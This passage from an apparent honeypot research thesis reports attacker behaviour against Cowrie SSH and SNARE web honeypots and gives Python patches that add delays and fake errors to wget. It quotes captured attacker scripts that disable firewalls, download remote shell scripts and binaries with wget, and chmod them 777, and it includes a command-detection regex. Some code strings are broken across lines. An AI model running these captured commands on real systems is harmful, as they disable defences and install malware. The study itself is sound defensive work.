IP address B: This attacker accessed both Cowrie and SNARE once on February 17, 2018 @ 09:34:18 and February 17, 2018 @ 09:02:12 respectively. They only did a scan and did not proceed to log in to Cowrie. They accessed /hndUnblock.cgi, tmUnblock.cgi, /moo, the root directory, and /getcfg.php on SNARE.

IP address C: This attacker accessed both Cowrie and SNARE once on February 24, 2018 @ 21:42:21 and on February 24, 2018 @ 09:02:13 respectively. They only did a scan and did not proceed to log in to Cowrie. They accessed /hndUnblock.cgi, tmUnblock.cgi, /moo, the root directory, and /getcfg.php on SNARE.

IP address D: This attacker accessed both Cowrie and SNARE once on February 20, 2018 @ 05:22:26 and on February 20, 2018 @ 08:02:30 respectively. They only did a scan and did not proceed to log in to Cowrie. They accessed only the root directory on SNARE and did no further actions.

IP address E: This attacker accessed both Cowrie and SNARE once on February 24, 2018 @ 06:35:14 and on February 16, 2018 @ 04:02:56 respectively. They only did a scan and did not proceed to log in to Cowrie. They accessed only the root directory on SNARE and did no further actions.

From these results, we concluded that attackers are not scanning the IP address on port 22 and 80 at the same time. Also, the attackers (B and C) from Brazil may have switched their IP address or they may have two bots, as the modus operandi of the two scans on SNARE is the same.

3. Observations—SNARE

a. Overall Activities

A total of 384 sessions were captured in Phase 1 from 75 distinct IP addresses. SNARE was first accessed after 14 hours of deployment and last accessed 14 minutes before stopping the experiment. It took quite a long period of time for attackers to start accessing the Web honeypot. The peak of the traffic was on February 23, 2018 when there were 73 sessions (Figure 4, generated by SNARE-Graph). The minimum number of probes per day was on February 24, 2018 when there were only two probes on that day.
Figure 4. Phase 1 SNARE—Most probes per day.

As shown in Figure 5, which was generated by SNARE-Graph, 28% of the attackers came from the United States as reported by MaxMind, where one IP address A comprised 20%. IP address B from Malta had the second highest percentage. We checked the two IP addresses in AbuseIPDB [31], a central repository for IP addresses associated with malicious activities, and found that IP address A has been reported 55 times and IP address B has been reported 3 times.

Figure 5. Phase 1 SNARE—Top 10 number of connections per unique IP pie chart.
b. Types of Activity

Of the 384 sessions, 92 or about 24% accessed the default root directory of the Web application server, which is normal if the attacker is just performing an IP Web scan. The other 76% were mainly sessions accessing setup.php and index.php of phpMyAdmin pages [32]. We also observed that apart from attackers accessing the default index page at the root directory, no sessions accessed the Web contents that we put on the server. The top 10 paths that the attackers accessed are displayed in Figure 6.

Figure 6. Top 10 paths that the attackers requested.

From the top ten paths, we observed that attackers were trying to check if the setup.php page for phpmyadmin, mysql, and the database are available on the server. The setup.php from phpMyAdmin is known to be prone to remote PHP code-injection vulnerability [33].

c. User Agents

Most attackers used Mozilla 5.0 for their user agents, and some used vulnerability scanners such as ZmEu [34], which targets Web servers that are running unpatched phpMyAdmin programs. Attackers also use ZmEu to brute-force the username and password
of SSH servers [34]. In our experiment, however, none of the ZmEu attackers scanned our Cowrie honeypot. The top 10 user agents used by the attackers are shown in Figure 7.

Figure 7. Top 10 user agents used by the attackers.

```

![](image)

```

d. **Attack Types and Session Durations**

In Phase 1, there were seven recorded attacks, and all accessed paths matched the CMD_EXEC pattern of “.*(alias |cat |cd |cp |echo |exec |find |for |grep |ifconfig |ls |man |mkdir |netstat |ping |ps |pwd |uname |wget |touch |while |).” This CMD_EXEC pattern consists of individual commands separated by the delimiter “|”. An example of an attack that would be picked up by the CMD_EXEC pattern is “mkdir test directory” where the command “mkdir” matches the pattern. Yet, we confirmed that all seven CMD_EXEC attacks observed were false positives as they were not in the list of executed commands listed above in the CMD_EXEC pattern. One of the CMD_EXEC attacks logged was “command.php” and we considered it a false positive as it matches the “man” command but is not a “man” command. We also observed that all the sessions, even for those that accessed more than 10 paths, started and ended within a second. This suggests that all these activities are performed by an automated process since a human could not click 10 links within a second.
4. Observations—Cowrie

a. Overall Activities

In Phase 1, 19,564 sessions originated from 584 distinct IP addresses. Cowrie was first accessed by attackers 22 minutes after it was run and continued to be accessed up to the point when the honeypot was shut down. The peak traffic was on February 28, 2018 with 2,737 probes (Figure 8 generated by Kippo-Graph). The minimum probes per day excluding the first day was on February 22, 2018, with 695 probes.

Figure 8. Phase 1 Cowrie—Most probes per day.

According to geolocation by MaxMind (Figure 9 generated by Kippo-Graph), more than 90% of the attackers came from Russia. IP addresses A, B, C, and D made up 20% respectively, and IP address E made up the remaining 10%. We checked the IP addresses A to D in AbuseIPDB [31] and found that IP addresses A, B, and D have been reported at least 15 times, and IP addresses C and E have been reported 5 and 16 times, respectively.
Figure 9. Phase 1 Cowrie—Top 10 number of connections per unique IP.

\begin{center}
\includegraphics[width=0.5\textwidth]{chart.png}
\end{center}

**b. Types of Login Activity**

A common activity on the honeypot was a brute-force password attack. The two most common usernames were “root” and “admin.” This is not surprising since both usernames are likely to provide administrator privileges on real systems. Even when attackers gained access to either of these two accounts, they would still attempt to gain access to the other account. Figure 10 generated by Kippo-Graph shows one example of 2 sets of brute-force attacks on a single host (highlighted in yellow and red). Most brute-force attacks ceased when a correct password was found.
Figure 10. Example of brute force attack on both “root” and “admin” accounts.

In a few instances, these clients attempted another brute-force attack and tried the password used previously among others (Figure 11). This suggests that they do not store the previously used passwords.
Figure 11. Example of cyclical brute force attack on the “root” account.

We also observed traffic that connected to the honeypot at periodic intervals. From one IP address, connections were established every five minutes and contributed to 15% of the total traffic (Figure 12).

Figure 12. Connections made from a single IP address at five-minute intervals.

c. Authentication

Cowrie can control login access using two different methods: (1) blacklists and whitelists, and (2) allowing random username-password combinations. A blacklist gives the username-password combinations that are denied access to the honeypot, while a whitelist gives username-password combinations that can access the honeypot. We found this method useful as the whitelist allows us to define specific usernames that we allow,
while the blacklist enables us to define specific passwords that we want to deny for a specific username.

When authenticating using blacklists and whitelists, the honeypot uses the userdb.txt file in the /cowrie/data folder. Table 6 shows example content of the file. Blacklisted username-password combinations must appear before the wildcard entry for that username.

Table 6. Blacklist and whitelist specifications in userdb.txt and their meaning.

<table>
<thead>
<tr>
<th>Entry in userdb.txt</th>
<th>Username</th>
<th>Password</th>
<th>Whitelist</th>
<th>Blacklist</th>
</tr>
</thead>
<tbody>
<tr>
<td>root:root</td>
<td>root</td>
<td>root</td>
<td></td>
<td>✓</td>
</tr>
<tr>
<td>root:x:*</td>
<td>root</td>
<td>Wildcard (any strings not in blacklist)</td>
<td>✓</td>
<td></td>
</tr>
<tr>
<td>richard:x:fout</td>
<td>richard</td>
<td>fout</td>
<td>✓</td>
<td></td>
</tr>
<tr>
<td>admin:x:*</td>
<td>admin</td>
<td>Wildcard (any strings not in blacklist)</td>
<td>✓</td>
<td></td>
</tr>
</tbody>
</table>

When Cowrie is configured to accept a random username-password combination, a user must try a random selected number of unique username/password combinations between the user-defined “mintry” and “maxtry” counts before succeeding with a login. The successful login combination is stored with the IP address and becomes the only acceptable combination for that IP address. This prevents the honeypot from accepting other usernames from that IP address, and this probably hurts a little the believability of the honeypot if the user tries a different login name. An advantage of this approach is that it permits accepting unusual and unanticipated username-password combinations. Given that attackers tend to use uncommon username-password combinations, this may reveal uncommon attack tactics.

In Phase 1, we ran the Cowrie honeypot using blacklist and whitelist authentication and observed that it allowed a single username to accept multiple passwords if the passwords belong to the whitelist for the username. Figure 13 shows that
multiple passwords for the “root” and “admin” usernames worked for a single IP address within less than an hour interval. This would be a clue that the system is a honeypot.

Figure 13. Example of the Cowrie honeypot accepting multiple passwords for a username from a single IP address.

![Table showing login attempts and success]

We observed a 74% success rate out of 19,564 login attempts (Figure 14 generated by Excel charts). Of the 14,406 successful logins, only 229 (1% of total logins) continued with further activities on the honeypot.

Figure 14. Percentage of successful logins in Phase 1.

![Pie chart showing success rates]
d. Measures of User Activity

As mentioned in Chapter III, we suspected that most traffic connecting to our honeypot originated from bots running identical scripts. We extracted the inputs from each session and compared their hash values. In 229 sessions, there were only 29 unique sets of inputs (12% of total sessions), confirming our hypothesis. Session durations were bimodal and predominantly between 2 and 38 seconds or between 185 and 232 seconds (Figure 15 generated Excel charts).

Figure 15. Histogram of session duration in Phase 1.

Session duration may be misleading because it could start with or end with a long wait for timeout either by the server or client. As such, we also computed the duration between the first and last user input to determine if there was a significant period of inactivity at the beginning or end of the session (Figures 16 and 17). We observed that the durations were spread over two intervals. On the lower end, the period of inactivity was about 30 seconds or less and represents user inactivity before the first input and file-transfer duration. On the higher end, the inactivity period is greater than 180 seconds, which is the timeout period for our SSH server.
Figure 16. Histogram of interval between first and last input in Phase 1.

![Histogram of interval between first and last input in Phase 1.](image)

Figure 17. Histogram of inactivity duration before first input and after last input in Phase 1.

![Histogram of inactivity duration before first input and after last input in Phase 1.](image)

Analysis of the logs revealed that sessions that lasted between 2 and 38 seconds were non-interactive sessions, while sessions between 185 and 232 seconds were interactive sessions. All the non-interactive sessions terminated upon the completion of their last command, while all the interactive sessions waited for the session to time out.
The number of command inputs during a session was concentrated at two extremes (Figure 18). At the lower end, 47% of the sessions had less than five inputs. At the higher end, about 50% of the sessions had more than 37 inputs. By comparing the hashes of the input sequences, we found 40 sessions had the same 39 commands. In addition, there were 74 sessions with the same 41 commands.

Figure 18. Histogram of Inputs per session in Phase 1.

These two groups of sessions are likely popular scripts. In fact, the usage of these two sequences of input originated from the same IP address in Poland. This client logs in between 5 and 16 times daily, averaging eight times per day. The logins used the “root” and “admin” accounts and with different passwords for each account (Figure 19). The scripts run were largely similar with two additional commands inserted between the first and second command of the shorter sequence (See Table 7 for details). These sessions were also the only interactive SSH sessions found during this phase.
Table 7. Comparison of two similar sequences of input.

<table>
<thead>
<tr>
<th>Input number</th>
<th>Shorter sequence</th>
<th>Longer sequence</th>
<th>Remarks</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>/gweerwe323f</td>
<td>/gweerwe323f</td>
<td></td>
</tr>
<tr>
<td>2</td>
<td>/bin/busybox cp</td>
<td>sudo /bin/sh</td>
<td>Additions to the longer</td>
</tr>
<tr>
<td></td>
<td></td>
<td>sequence</td>
<td></td>
</tr>
<tr>
<td>3</td>
<td></td>
<td>/bin/sh</td>
<td></td>
</tr>
<tr>
<td>4</td>
<td></td>
<td>/bin/busybox cp</td>
<td></td>
</tr>
</tbody>
</table>

Figure 19. Sample of logins from IP address originating from Poland.

Of the 229 sessions with activities, 26 sessions transferred files using the wget command. Fifteen of the 27 files transferred were distinct. The wget command is frequently used on systems and has a great variety of responses that can be presented to a client. Therefore, we decided to focus our deception techniques on this command.
B. PHASE 2—IMPLEMENTATION OF DECEPTION TECHNIQUES

In Phase 2, we enhanced the honeypots with some deception techniques discussed in Chapter II and studied how cyber attackers reacted to them. Three specific deception techniques (defensive camouflage, delays, and false excuses) were implemented in the SSH honeypot in Phases 2A, 2B and 2C respectively. Phase 2D was subsequently added to correct an error in the implementation of Phases 2B and 2C. For the Web honeypot, we implemented the fake-files deception technique.

1. Phase 2A: Fake Files for the Web Honeypot

This phase of the experiment used the fake-files deception technique, where interesting fake files are used as bait for attackers who exploit the honeypot looking for personal or corporate data. Using the ten most common paths that the attackers accessed in Phase 1, we generated fake files whose filenames are hashed using MD5 [35] and placed them into our Web honeypot. In addition to this, we generated a Web page called “members.htm” with fake personal details such as name, email address, and contact number. The code for the generators is detailed in Appendix D.

a. Overall Activities

A total of 1,562 sessions was captured in Phase 2A from 384 distinct IP addresses. This was around a fourfold increase in the number of sessions and around a fivefold increase in the number of distinct IP addresses as compared to Phase 1. We noticed that SNARE was first accessed 39 minutes after deployment and last accessed 52 minutes before the experiment was stopped. As compared to Phase 1, many more attackers accessed the Web honeypot, and they first accessed it earlier than before. This increase in traffic may be due to us submitting the SNARE website link to Google index before the start of this phase. The peak of the traffic was on May 21, 2018, when there were 169 probes that day. The minimum number of probes per day—besides the start day—occurred on May 18, 2018, when there were 54 probes.

As shown in Figure 20, 41% of the attackers came from a single IP address A in the United States. There were also many attackers from China, which provided six of the
top 10 addresses. IP address A was not the top IP address in Phase 1; it used the NMAP scripting engine and it belongs to our school. For the traffic from China, the six IP addresses were in AbuseIPDB, and all were reported to be associated with malicious activities. Not counting the sessions from the United States, Phase 2A was dominated by attackers from China, which made up 68% of the traffic. This is interesting as the traffic from China was just 7% in Phase 1.

Figure 20. Phase 2A SNARE—Top 10 number of connections per unique IP.

b. Top Ten Paths

Most attackers in Phase 2A were accessing the default root directory of the Web server. They made up around 40% (638/1562) of the total number of sessions. For the remaining 60%, we observed an interesting change in the attackers’ action. In Phase 1, the top 10 paths were mainly setup.php files, but in Phase 2A the top 10 paths were index.php, and only 3% (49/1562) were setup.php pages. Attackers only accessed three setup.php files (/phpmyadmin/scripts/setup.php, pma/scripts/setup.php, and phpMyAdmin/scripts/setup.php) that we created. Nonetheless, there was no further action after the attackers accessed them.
c. **Fake Personal Details Page**

We used a personal-name list provided by Prof. Rowe of around 280,000 distinct names to generate 100 distinct first-last name pairs. We also generated fake email addresses and contact numbers for them. To make the email addresses look convincing, we randomized their email addresses to be from the domains of mail.com, yahoo.com, nps.edu, hotmail.com, gmail.com, and comcast.net. The fake personal details were put into a formatted table in the “members.htm” file on our Web honeypot. Yet, we never observed attackers accessing it.

2. **Phase 2A: Defensive Camouflage for the SSH Honeypot**

Phase 2A sought to improve the authentication mechanism of the SSH Honeypot to be more like an actual SSH server. We allowed each IP address to log in using multiple usernames, but each username could only have one acceptable password. This condition reduces the number of sessions established from the same host using different passwords for a single username and running identical scripts (Section 4D) which provide no additional insights on user activities. The following code segment (Figure 22) was added to the auth.py file to implement this improvement.
Figure 22. Code segment added to the auth.py.

```python
self.ipdb_file = src_ip  # set the filename to the ip of the client

if path.isfile(self.ipdb_file):
    with open(self.ipdb_file, 'rb') as fp:
        while True:
            rawline = fp.readline()
            if not rawline:
                break
            line = rawline.strip()
            if not line:
                continue
            if line.startswith(b'#'):
                continue
            (login, uid, passwd) = line.split(b':', 2)  # split line into the variables
            self.ipdb.append((login, passwd))  # append the username and password combination to the list

for (login, passwd) in self.ipdb:
    # for each combination in the list
    if login == thelogin and passwd != thepasswd:  # if username is found and password is blacklisted
        return False
    if login == thelogin and passwd == thepasswd:  # if username is found and password is blacklisted
        return True

for (login, passwd) in self.userdb:
    # start of original code to check username and password combination against userdb.txt
```

**a. Overall Activities**

Phase 2A had 31,193 login attempts, a 37% increase from Phase 1. The number of distinct IP addresses recorded also increased by 9.4% to 639. The five highest numbers of probes continued to originate from Russia and were all login attempts carried out at five-minute intervals. While the host addresses were different, the network addresses came from two of the same network addresses observed in Phase 1. Despite restricting passwords, the proportion of successful logins remained largely unchanged (Figure 23). There were, however, fewer sessions that proceeded with further activities after login.
Figure 23. Percentage of successful logins in Phase 2A.

![Percentage of successful logins in Phase 2A.](image)

**b. Measures of User Activity**

Session durations in Phase 2A were concentrated between 32 and 41 seconds (Figure 24). Compared to Phase 1, there were significantly fewer short-duration sessions (Figure 25). This may suggest that the defensive camouflage is hiding the honeypot, resulting in attackers interacting longer with it. Three interactive SSH sessions originated from a different IP address and ran different inputs on the honeypot.

Figure 24. Histogram of session durations for Phase 2A.

![Histogram of session durations for Phase 2A.](image)
In Phase 2A, close to 83% of the sessions had only four commands (Figure 26). Only one session (0.6%) in Phase 2A entered more than 10 commands, compared to about 50% of the sessions in Phase 1. The two scripts that contributed a high number of commands were not found during this phase. They could have lost popularity, or attackers might have shifted to other types of attacks.

The number of unique sets of input among established sessions dropped from 29 in Phase 1 to 16 in Phase 2A. There was also a decline in the number of file transfers during this phase. Only seven of the sessions transferred files, of which five were unique.
3. Phase 2B: Delays for the wget Command on the SSH Honeypot

In this phase, modifications made to the honeypot in Phase 2A were maintained, and a delay deception was added to the wget command. For this experiment, we implemented a delay to the apparent progress of the wget command with a random value between 30 seconds and 90 seconds. In selecting the lower bound, we wanted a delay that was significant enough compared to the time required to transfer the file, while the upper bound needed to be lower than the inactivity timeout period of 180 seconds so that the SSH session would not terminate due to inactivity. To enable the transfer to take place in the background while making it seem like there was no progress to the file transfer, we hid the progress bar of the transfer and only begin to display it after the delay (Figure 27). As discussed in Chapter 2, this enables a scan of the file to decide if we should allow the client to run it.

Figure 27. Code segment added to wget.py.

```python
def pageEnd(self):
    #####################################
    # original code to save file to download folder
    #####################################
    minD = 30  # minimum delay
    maxD = 90  # maximum delay
    delay = random.randint(minD, maxD)  # generate delay value
    time.sleep(delay)
    #####################################
    # original code to write download complete message to client’s terminal
    #####################################
```

a. Overall Activities

In Phase 2B, we maintained the list of permitted username-password combinations that were generated for each IP address in Phase 2A. There were 62,658 login attempts, a 100% increase from Phase 2A. The number of distinct IP addresses also increased by 73.8% to 1,111. The proportion of successful logins increased by 16% compared to Phase 1, and the number of sessions that continued with further activities increased from 164 to 258 (Figure 28).
The top five IP addresses with the highest number of probes continued to originate from Russia and were all login attempts carried out at five-minute intervals. While the host addresses were different, the network addresses came from two of the same network addresses observed in Phase 1.

\[ \text{b. Measures of User Activity} \]

The session durations for Phase 2B maintained the trend in Phase 2A of being concentrated at one interval. However, we noted that the spread of the duration over this interval widened to a 20 seconds block between 23 seconds and 42 seconds (Figure 29).
The number of commands also maintained the trend observed in Phase 2A where most of the sessions had only four commands (Figure 30).

Figure 30. Histogram of number of commands for Phase 2B.
There were 12 wget file transfers in which five files were unique. The percentage of unique sets of input among the established sessions further declined to 5.4% compared to 9.76% in Phase 2A and 12% in Phase 1. As mentioned previously, we were most interested in investigating how our deception affected different users attempting to transfer files using the same script. We found one such instance during this phase where a file was transferred using the same script during four different sessions. The script is shown in Figure 31.

Figure 31. Content of script used to transfer files in four different sessions in Phase 2B.

```
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /etc
yum install -y wget
wget -c http://XXX.XXX.XXX.XXX:9960/chongfu.sh
```

All four sessions used identical scripts that timed out during the transfer attempt. The logs indicated that there was neither a progress bar nor a transfer-completed message transmitted to the client. The same script was executed by two different clients with each client running the script twice about one minute apart. Looking through the logs, we discovered that all the transfers timed out when connecting with the server. Based on the option `--c` (continue to download a partially downloaded file) used for the wget command, we suspect that the file-source host may not have a stable connection.

We also found five sets of similar input, each run 46 times, during this phase (Figure 32). They originated from the same IP address from Japan. This client first attempted to log in using the `root` account but failed. It then logged in successfully using the “admin” and “ubnt” accounts (Figure 33) and proceeded to establish regular connections to our honeypot for about two days. The same IP address also ran another set
of two inputs twice (Figure 34). Based on Figures 33 and 35, we can see that the two inputs likely fingerprinted the version of our operating system. From the sequence of the sessions, we can observe that the general pattern of this client was to run the five scripts sequentially with the ‘admin’ username, followed by the same five scripts using the “ubnt” username in one cycle. The intervals between the sessions within a cycle are short compared to the interval to the next cycle (Figure 36).

Figure 32. Five sets of similar inputs found in Phase 2B.

<table>
<thead>
<tr>
<th>ID</th>
<th>MD5 Hash</th>
<th>Input</th>
<th>Counter</th>
</tr>
</thead>
<tbody>
<tr>
<td>3</td>
<td>fc1edf14</td>
<td><a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td>46</td>
</tr>
<tr>
<td></td>
<td>c9f2aa4f</td>
<td>cat -r <a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td></td>
<td>817d7f16</td>
<td>chmod 777 <a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td></td>
<td>80e1708c</td>
<td><a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td>4</td>
<td>4c3b66c3</td>
<td><a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td>46</td>
</tr>
<tr>
<td></td>
<td>2755c72f</td>
<td>cat -r <a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td></td>
<td>476026f6</td>
<td>chmod 777 <a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td></td>
<td>90f552cb</td>
<td><a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td>5</td>
<td>a2de354f</td>
<td><a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td>46</td>
</tr>
<tr>
<td></td>
<td>1690d046</td>
<td>cat -r <a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td></td>
<td>6f8b71d4</td>
<td>chmod 777 <a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td></td>
<td>daa691f8</td>
<td><a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td>6</td>
<td>3820a78f</td>
<td><a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td>46</td>
</tr>
<tr>
<td></td>
<td>7f898d79</td>
<td>cat -r <a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td></td>
<td>4d556f3b</td>
<td>chmod 777 <a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td></td>
<td>06d58bc7</td>
<td><a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td>7</td>
<td>4b80b2b7</td>
<td><a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td>46</td>
</tr>
<tr>
<td></td>
<td>4b316b57</td>
<td>cat -r <a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td></td>
<td>1f4f229e</td>
<td>chmod 777 <a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
<tr>
<td></td>
<td>03b5f195</td>
<td><a href="http://xx/sdlamon.armv4l.mod">http://xx/sdlamon.armv4l.mod</a></td>
<td></td>
</tr>
</tbody>
</table>

Figure 33. Initial login attempts to the “root,” “admin” and “ubnt” accounts.
Figure 34. Two inputs used to fingerprint the version of the operating system.

Figure 35. The first session from each username fingerprinting the operating system version.

Figure 36. Behavioral pattern of a client executing the five scripts.
4. Phase 2C: The False-Excuses Technique for the wget Command on the SSH Honeypot

File transfers can also encounter errors. In Phase 2C, we replaced the delay deception implemented in Phase 2B with false excuses by implementing error messages for the wget command. We selected 10 HTTP error codes [36] that included both common and less-common responses (Table 8). To prevent attackers from being discouraged by constant false excuses, the deception would trigger with a 50% probability (See Figure 37). If deception was triggered, an excuse would be selected from Table 8 with equal probability.

```
def pageEnd(self):
    #original code to save file to download folder
    if self.excuse == -1:
        excuseenum = random.randint(0, 9)  #if false excuse is used
        #determine excuse to reply
        if excuseenum == 0:
            self.errorWrite('400 Bad Request
')  #write excuse to client terminal
            log.msg('False Excuse: 400 Bad Request
')  #log excuse used in log file
        if excuseenum == 1:
            self.errorWrite('401 Unauthorized
')
            log.msg('False Excuse: 401 Unauthorized
')
        if excuseenum == 2:
            self.errorWrite('403 Forbidden
')
            log.msg('False Excuse: 403 Forbidden
')
        if excuseenum == 3:
            self.errorWrite('404 Not Found
')
            log.msg('False Excuse: 404 Not Found
')
        if excuseenum == 4:
            time.sleep(120)
            self.errorWrite('408 Request Timeout
')
            log.msg('False Excuse: 408 Request Timeout
')
        if excuseenum == 5:
            self.errorWrite('451 Unavailable For Legal Reasons
')
            log.msg('False Excuse: 451 Unavailable For Legal Reasons
')
        if excuseenum == 6:
            self.errorWrite('500 Internal Server Error
')
            log.msg('False Excuse: 500 Internal Server Error
')
        if excuseenum == 7:
            self.errorWrite('502 Bad Gateway
')
            log.msg('False Excuse: 502 Bad Gateway
')
        if excuseenum == 8:
            self.errorWrite('503 Service Unavailable
')
            log.msg('False Excuse: 503 Service Unavailable
')
        if excuseenum == 9:
            time.sleep(120)
            self.errorWrite('504 Gateway Timeout
')
            log.msg('False Excuse: 504 Gateway Timeout
')
        self.exit()
    else:
        #original code to write download complete message to client’s terminal
```

Figure 37. Code segment added to wget.py.
Table 8. HTTP codes use for false excuses.

<table>
<thead>
<tr>
<th>Code</th>
<th>Description</th>
<th>Remarks</th>
</tr>
</thead>
<tbody>
<tr>
<td>400</td>
<td>Bad Request</td>
<td></td>
</tr>
<tr>
<td>401</td>
<td>Unauthorized</td>
<td></td>
</tr>
<tr>
<td>403</td>
<td>Forbidden</td>
<td></td>
</tr>
<tr>
<td>404</td>
<td>Not Found</td>
<td></td>
</tr>
<tr>
<td>408</td>
<td>Request Timeout</td>
<td>Implemented with a 120 second delay</td>
</tr>
<tr>
<td>451</td>
<td>Unavailable For Legal Reasons</td>
<td></td>
</tr>
<tr>
<td>500</td>
<td>Internal Server Error</td>
<td></td>
</tr>
<tr>
<td>502</td>
<td>Bad Gateway</td>
<td></td>
</tr>
<tr>
<td>503</td>
<td>Service Unavailable</td>
<td></td>
</tr>
<tr>
<td>504</td>
<td>Gateway Timeout</td>
<td>Implemented with a 120 second delay</td>
</tr>
</tbody>
</table>

a. Overall Activities

In Phase 2C, we used the list of permitted username-password combinations that were generated for each IP address in prior experiments. There were 54,564 login attempts, a 13% decrease from Phase 2B. The number of distinct IP addresses increased slightly by 1.2% to 647. The number of sessions that had further interactions with the honeypot increased by about 10 times to 2,695 sessions (Figure 38). The top four IP addresses again were in Russia and were identical to the top four IP addresses in Phase 2B.

Figure 38. Percentage of successful logins in Phase 2C.
b. Measures of User Activity

The session duration for Phase 2C maintained the trend observed in both Phase 2A and Phase 2B where the durations were concentrated at one interval. The spread of the duration over this one interval, however, widened to a 40-second block between 23 seconds and 62 seconds (Figure 39).

![Histogram of session durations for Phase 2C.](image)

The number of commands input during this phase also maintained the trend observed in Phase 2A and Phase 2B where most sessions had only four commands (Figure 40). This is because the same inputs in Figure 32 were again repeatedly sent to our honeypot. While the inputs originated from the same source IP address during Phase 2B, they originated from three IP addresses in Japan, Brazil, and the United States during Phase 2C.
There were 12 wget file transfers of which eight files were unique. The number of unique sets of input increased to 25. As in Phase 2B, we observed from the log that the sessions did not show the progress bar or the false excuses that we have implemented, as the file transfers all timed out before any data was transferred.

Based on the identical IP addresses we saw in the wget commands and the client’s source IP address, we found that most clients had attempted to transfer the files from themselves to the honeypot. Therefore, we suspect that the client had knowledge of the real progress of the file transfer and terminated the session before receiving our deceptions. This caused our false excuses to not be transmitted to the client. We originally implemented the delay and false excuses after the file was successfully transferred in the background since we wanted to be able to analyze the content of the files. But because the transfer had timed out and no data was transferred at all, we were unable to determine the effectiveness of our deception techniques in Phases 2B and 2C.
5. **Phase 2D: Modified Delay and False Excuses for the wget Command on the SSH Honeypot**

To correctly test the effects of our deception techniques, we amended our code in this phase to implement either the delay or false excuses before the file transfer commences. Each deception technique had a 50% probability of being used when a wget command was entered. When a delay was selected, it would be between 30 and 90 seconds. If a false excuse was selected, one from Table 8 would be sent to the client. The modified code is shown in Figure 41.
Figure 41. Modified wget.py for Phase 2D.

def download(self, url, fakeoutfile, outputfile, *args, **kwargs):
    # code inserted to down function instead of pageEnd
    self.excuse = random.randint(0, 1)  # random number to determine whether to usedelay or false excuse

    # original code section to parse url and check if http or https download
    if self.excuse == 1:  # use false excuse
        excusenum = random.randint(0, 9)  # determine excuse to reply
        if excusenum == 0:
            self.errorWrite('400 Bad Request
')
            log.msg('False Excuse: 400 Bad Request
')
        if excusenum == 1:
            self.errorWrite('401 Unauthorized
')
            log.msg('False Excuse: 401 Unauthorized
')
        if excusenum == 2:
            self.errorWrite('403 Forbidden
')
            log.msg('False Excuse: 403 Forbidden
')
        if excusenum == 3:
            self.errorWrite('404 Not Found
')
            log.msg('False Excuse: 404 Not Found
')
        if excusenum == 4:
            time.sleep(120)
            self.errorWrite('408 Request Timeout
')
            log.msg('False Excuse: 408 Request Timeout
')
        if excusenum == 5:
            self.errorWrite('451 Unavailable For Legal Reasons
')
            log.msg('False Excuse: 451 Unavailable For Legal Reasons
')
        if excusenum == 6:
            self.errorWrite('500 Internal Server Error
')
            log.msg('False Excuse: 500 Internal Server Error
')
        if excusenum == 7:
            self.errorWrite('502 Bad Gateway
')
            log.msg('False Excuse: 502 Bad Gateway
')
        if excusenum == 8:
            self.errorWrite('503 Service Unavailable
')
            log.msg('False Excuse: 503 Service Unavailable
')
        if excusenum == 9:
            time.sleep(120)
            self.errorWrite('504 Gateway Timeout
')
            log.msg('False Excuse: 504 Gateway Timeout
')
    self.exit()

    if self.excuse == 0:  # use delay
        minD = 30  # minimum delay in seconds
        maxD = 90  # maximum delay in seconds
        delay = random.randint(minD, maxD)  # generate delay value
        time.sleep(delay)
        log.msg('Delay: ' + str(delay) + '
')  # log delay value used

        factory = HTTPProgressDownloader(self, fakeoutfile, url, outputfile, *args, **kwargs)  # begin download

# original code below

---

**a. Overall Activities**

In this phase, we continued to use the list of permitted username-password combinations that were generated for each IP address in prior experiments. There were
36,255 login attempts, a 33.56% decrease from Phase 2C. The number of distinct IP addresses increased slightly by 2% to 660. The number of sessions that had further interactions with the honeypot increased by about 95% to 125 sessions (Figure 42). The top nine IP addresses were from Russia and were among the top seven IP addresses in Phase 2C.

Figure 42. Percentage of successful logins in Phase 2D.

![Percentage of successful logins in Phase 2D.](image)

b. **Measures of User Activity**

The session durations for Phase 2D appear to have shifted concentration from between 23 seconds and 62 seconds in Phase 2C to between 1 second and 41 seconds (Figure 43).
The commands input during this phase continued to show a high number of four commands attributed to the inputs in Figure 32. Nevertheless, there was also a rise in the number of sessions with a single command, with 24.5% of them being wget commands.
